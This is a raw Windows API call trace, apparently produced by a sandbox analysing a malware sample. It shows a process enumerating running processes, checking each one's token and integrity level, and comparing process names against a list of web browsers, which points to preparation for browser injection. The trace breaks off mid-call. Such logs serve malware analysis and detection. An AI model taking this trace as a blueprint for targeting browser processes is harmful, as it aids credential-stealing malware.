GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.193] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.193] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.194] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0233.194] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0233.194] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0233.194] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0233.194] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0233.194] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0233.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0233.194] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.194] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.194] GetLastError () returned 0x7a [0233.194] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.194] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.194] CloseHandle (hObject=0xb8) returned 1 [0233.194] CloseHandle (hObject=0xb4) returned 1 [0233.194] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.194] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.194] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.194] GetLastError () returned 0x7a [0233.194] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.194] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.194] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.194] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0233.194] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0233.194] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0233.194] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0233.194] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0233.194] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0233.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0233.194] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.194] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.194] GetLastError () returned 0x7a [0233.194] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.194] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.194] CloseHandle (hObject=0xb8) returned 1 [0233.194] CloseHandle (hObject=0xb4) returned 1 [0233.194] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.194] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.194] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.194] GetLastError () returned 0x7a [0233.195] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.195] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.195] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.195] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0233.195] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0233.195] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0233.195] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0233.195] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0233.195] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0233.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0233.195] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.195] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.195] GetLastError () returned 0x7a [0233.195] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.195] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.195] CloseHandle (hObject=0xb8) returned 1 [0233.195] CloseHandle (hObject=0xb4) returned 1 [0233.195] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.195] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.195] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.195] GetLastError () returned 0x7a [0233.195] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.195] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.195] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.195] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.195] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0233.195] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.195] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.195] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.195] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0233.195] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.195] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.195] GetLastError () returned 0x7a [0233.195] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.195] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.195] CloseHandle (hObject=0xb8) returned 1 [0233.195] CloseHandle (hObject=0xb4) returned 1 [0233.196] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.196] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.196] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.196] GetLastError () returned 0x7a [0233.196] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.196] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.196] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.196] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0233.196] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0233.196] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0233.196] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0233.196] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0233.196] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0233.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0233.196] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.196] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.196] GetLastError () returned 0x7a [0233.196] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.196] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.196] CloseHandle (hObject=0xb8) returned 1 [0233.196] CloseHandle (hObject=0xb4) returned 1 [0233.196] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.196] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.196] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.196] GetLastError () returned 0x7a [0233.196] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.196] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.196] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.196] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0233.196] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0233.196] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0233.196] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0233.196] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0233.196] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0233.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0233.197] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.197] GetLastError () returned 0x7a [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.197] CloseHandle (hObject=0xb8) returned 1 [0233.197] CloseHandle (hObject=0xb4) returned 1 [0233.197] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.197] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.197] GetLastError () returned 0x7a [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.197] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.197] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.197] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0233.197] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0233.197] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0233.197] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0233.197] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0233.197] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0233.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0233.197] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.197] GetLastError () returned 0x7a [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.197] CloseHandle (hObject=0xb8) returned 1 [0233.197] CloseHandle (hObject=0xb4) returned 1 [0233.197] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.197] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.197] GetLastError () returned 0x7a [0233.197] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.197] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.197] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.197] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0233.197] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0233.198] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0233.198] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0233.198] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0233.198] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0233.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0233.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0233.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0233.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0233.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0233.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0233.198] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.198] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.198] GetLastError () returned 0x7a [0233.198] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.198] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.198] CloseHandle (hObject=0xb8) returned 1 [0233.198] CloseHandle (hObject=0xb4) returned 1 [0233.198] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.198] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.198] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.198] GetLastError () returned 0x7a [0233.198] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.198] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.198] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.198] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0233.198] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0233.198] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0233.198] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0233.198] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0233.198] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0233.198] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.199] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0235.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xc0f0) returned 0xc0000004 [0235.259] VirtualAlloc (lpAddress=0x0, dwSize=0xd0f0, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0235.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xd0f0, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0235.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0235.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0235.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0235.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0235.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0235.264] OpenProcess 